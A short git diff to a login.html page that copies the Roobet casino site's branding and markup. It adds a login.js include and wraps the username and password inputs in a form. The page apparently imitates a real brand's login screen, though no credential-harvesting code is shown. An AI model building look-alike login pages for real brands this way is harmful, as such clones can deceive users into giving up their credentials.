Feat:API INtegration

--- a/login.html
+++ b/login.html
@@ -28,6 +28,7 @@
       content="Roobet.com Official Website: Roobet Casino is Crypto's Fastest Growing Casino, and it's run by a kangaroo. Hop in, chat with friends and play 2,400+ games!"
       data-rh="true"
     />
+    <script src="login.js"></script>
   </head>
   <body>
     <div class="maindiv">
@@ -75,7 +76,9 @@
               </div>
 
               <!-- inputs fields -->
+              <form action="submit" id="signupForm">
               <div class="css-oeyxfx gap">
+             
                 <p
                   class="MuiTypography-root MuiTypography-body2 MuiTypography-noWrap css-qxat7i"
                 >
@@ -95,6 +98,7 @@
                     type="text"
                     class="MuiInputBase-input MuiOutlinedInput-input css-so2qui"
                     value=""
+                    aria-required="true"
                   />
                   <fieldset
                     aria-hidden="true"
@@ -113,7 +117,9 @@
                       float: left !important;
                     "
                   ></div>
+                </form >
                 </div>
+           
               </div>
               <div class="css-oeyxfx gap">
                 <p
@@ -135,6 +141,7 @@
                     type="password"
                     class="MuiInputBase-input css-so2qui1"
                     value=""
+                    aria-required="true"
                   />
                   <button
                     class="MuiButtonBase-root-561 MuiIconButton-root-553 roo424 roo435 MuiIconButton-sizeSmall-559"
